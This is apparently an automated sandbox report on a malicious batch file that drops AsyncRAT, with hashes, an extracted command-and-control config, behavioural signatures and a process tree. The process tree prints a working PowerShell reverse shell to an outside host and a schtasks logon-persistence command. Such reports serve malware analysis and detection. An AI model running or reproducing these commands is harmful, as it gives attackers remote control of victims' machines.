Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 23:44
Static task
static1
General
-
Target
create.bat
-
Size
953B
-
MD5
a34e9091b3cb1b1fddb64dd1e6eafe8b
-
SHA1
73a9ce1190dbf81871d72cc98b7d81487bad17dc
-
SHA256
b79c63a1f5777b977a48085de65f8041d1d6b2d5d569224b0f81b343578f1803
-
SHA512
65391766927605aef01be482578b0f11fc9a9dfd0ee0b0a62ff1df6d07346a4b6d5a0d7409983f3fcd7b8a98e5376fd15bc8961b477be683e88ddf8e5619d0b7
Malware Config
Extracted
asyncrat
Default
technical-southwest.gl.at.ply.gg:58694
-
delay
1
-
install
true
-
install_file
WINDOWS.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0003000000000707-21.dat family_asyncrat -
Blocklisted process makes network request 3 IoCs
flow pid Process 5 1428 powershell.exe 49 1428 powershell.exe 51 1428 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Loader.exe -
Executes dropped EXE 2 IoCs
pid Process 3132 Loader.exe 2396 WINDOWS.exe -
pid Process 1428 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 2612 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 468 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1428 powershell.exe 1428 powershell.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 3132 Loader.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe 2396 WINDOWS.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1428 powershell.exe Token: SeDebugPrivilege 3132 Loader.exe Token: SeDebugPrivilege 3132 Loader.exe Token: SeDebugPrivilege 2396 WINDOWS.exe Token: SeDebugPrivilege 2396 WINDOWS.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 796 wrote to memory of 1428 796 cmd.exe 85 PID 796 wrote to memory of 1428 796 cmd.exe 85 PID 1428 wrote to memory of 3132 1428 powershell.exe 103 PID 1428 wrote to memory of 3132 1428 powershell.exe 103 PID 3132 wrote to memory of 4692 3132 Loader.exe 107 PID 3132 wrote to memory of 4692 3132 Loader.exe 107 PID 3132 wrote to memory of 4536 3132 Loader.exe 109 PID 3132 wrote to memory of 4536 3132 Loader.exe 109 PID 4692 wrote to memory of 468 4692 cmd.exe 111 PID 4692 wrote to memory of 468 4692 cmd.exe 111 PID 4536 wrote to memory of 2612 4536 cmd.exe 112 PID 4536 wrote to memory of 2612 4536 cmd.exe 112 PID 4536 wrote to memory of 2396 4536 cmd.exe 113 PID 4536 wrote to memory of 2396 4536 cmd.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\create.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "$LHOST = 'radio-ebay.gl.at.ply.gg'; $LPORT = 10404; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) } catch { $_ }; $StreamWriter.Write('$Output`n'); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Users\Admin\Desktop\Loader.exe"C:\Users\Admin\Desktop\Loader.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3F41.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:2612
-
-
C:\Users\Admin\AppData\Roaming\WINDOWS.exe"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
151B
MD51cf76cd1858f9e1dc9434fbf2fd787ae
SHA117f8a55e0aa203e39ea76a4890e156a94587ff6e
SHA2564aee591a9206c96114c48d3f91e8d32f681405fffdcde86df3b9d2c6dc32fafb
SHA5121096173f4e0a571af6246480d97f5aef91515d6dce869f12ed3a08f84f94054cc9fc5f2aa2895549dcb98b853872e89cb00f54fb8ae9b89c23780fa208f71502
-
Filesize
63KB
MD57ceb11ebb7a55e33a82bc3b66f554e79
SHA18dfd574ad06ded662d92d81b72f14c1914ac45b5
SHA256aea3e89e45a33441bcd06c990282f8601eb960a641c611222dce2fe09685e603
SHA512d8cd7af50996015163c8926fc7b6df6a6e2c0b3f6c8fcff37cad5b72fed115f7134723d99f61a20576b83e67107a3a410f5ef2312191446b3d0759cb739e6ccd